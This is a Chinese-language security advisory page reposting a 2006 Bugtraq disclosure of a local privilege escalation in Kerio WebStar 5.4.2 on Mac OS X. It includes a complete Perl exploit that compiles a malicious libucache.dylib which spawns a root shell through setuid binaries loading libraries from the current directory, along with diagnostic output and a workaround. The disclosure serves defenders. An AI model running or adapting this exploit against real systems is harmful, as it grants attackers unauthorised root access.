 |
Kerio WebStar本地权限提升漏洞 |
|
|
| Kerio WebStar本地权限提升漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:11:07 |
|
2006-11-21 17:46:46
发布日期:2006-11-13
更新日期:2006-11-21
受影响系统:Kerio WebStar 5.4.2 描述:
BUGTRAQ ID: 21123
Kerio WebSTAR是运行在Mac OS X平台上的WEB服务器。
Kerio WebSTAR在不安全的权限安装程序文件,本地攻击者可能利用此提升自己的权限。
在安装Kerio WebSTAR时/Applications中继承了两个setuid二进制程序:
kevin-finisterres-computer:~/Desktop kf$ find /Applications/Kerio\ WebSTAR -perm -4000 -ls
978790 3016 -rwsrwx--x 1 root admin 1542556 Apr 10 2006 /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
979475 3288 -rwsrwx--- 1 root admin 1679724 Apr 10 2006 /Applications/Kerio WebSTAR/WebServer/WSWebServer
如果攻击者能够访问webstar用户或admin组的话,就可以通过滥用上述两个二进制程序以root用户权限执行代码。这两个二进制程序都试图加载当前目录中的帮助程序库,因此攻击者可以通过提供已植入了木马的应用程序来利用这个漏洞。
kevin-finisterres-computer:~ kf$ /Applications/Kerio\ WebSTAR/WebServer/WSWebServer
dyld: Library not loaded: libucache.dylib
Referenced from: /Applications/Kerio WebSTAR/WebServer/WSWebServer
Reason: image not found
Trace/BPT trap
kevin-finisterres-computer:~ kf$ /Applications/Kerio\ WebSTAR/AdminServer/WSAdminServer
dyld: Library not loaded: libucache.dylib
Referenced from: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
Reason: image not found
Trace/BPT trap
ktrace可以更清楚的说明这个漏洞:
1183 WSAdminServer CALL open(0x17e8,0,0)
1183 WSAdminServer NAMI "libucache.dylib"
1183 WSAdminServer RET open -1 errno 2 No such file or directory
1183 WSAdminServer CALL close(0xffffffff)
...
1183 WSAdminServer CALL open(0xbfffea90,0,0)
1183 WSAdminServer NAMI "/var/root/lib/libucache.dylib"
1183 WSAdminServer RET open -1 errno 2 No such file or directory
1183 WSAdminServer CALL close(0xffffffff)
1183 WSAdminServer RET close -1 errno 9 Bad file descriptor
1183 WSAdminServer CALL open(0xbfffea90,0,0)
1183 WSAdminServer NAMI "/usr/local/lib/libucache.dylib"
1183 WSAdminServer RET open -1 errno 2 No such file or directory
1183 WSAdminServer CALL close(0xffffffff)
1183 WSAdminServer RET close -1 errno 9 Bad file descriptor
1183 WSAdminServer CALL open(0xbfffeaa0,0,0)
1183 WSAdminServer NAMI "/usr/lib/libucache.dylib"
1183 WSAdminServer RET open -1 errno 2 No such file or directory
1183 WSAdminServer CALL close(0xffffffff)
<*来源:Kevin Finisterre (dotslash@snosoft.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116371608620379&q=p3
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! #!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# you must have access to the webstar user or be in the admin group
#
# This is currently not patched... chmod -s your kerio binaries
foreach $key (keys %ENV) {
delete $ENV{$key};
}
$tgts{"0"} = "kerio-webstar-5.4.2-mac.bin - WSAdminServer:/Applications/Kerio WebSTAR/AdminServer/WSAdminServer";
$tgts{"1"} = "kerio-webstar-5.4.2-mac.bin - WSWebServer:/Applications/Kerio WebSTAR/WebServer/WSWebServer";
unless (($target) = @ARGV) {
print "\n\nUsage: $0 <target> \n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a\n";
}
print "\n";
exit 1;
}
$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Binary: $b\n";
open(KP,">/tmp/kerio_pwn.c");
printf KP "extern char * argv; __attribute__((constructor)) static void kerio_pwned()\n";
printf KP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); exit(0); }\n";
system("gcc -dynamiclib -o /tmp/libucache.dylib /tmp/kerio_pwn.c -current_version 5.0.1 -compatibility_version 5.0.1 -install_name libucache.5.dylib -arch ppc");
system("cd /tmp; \"$b\"");
建议:
临时解决方法:
* 限制对admin组和webstar用户的访问。
厂商补丁:
Kerio
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.kerio.com/
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: Acer LunchApp.APlunch ActiveX控件不安全Run方法漏洞
下一篇新闻: Ultraseek信息泄露及请求代理漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
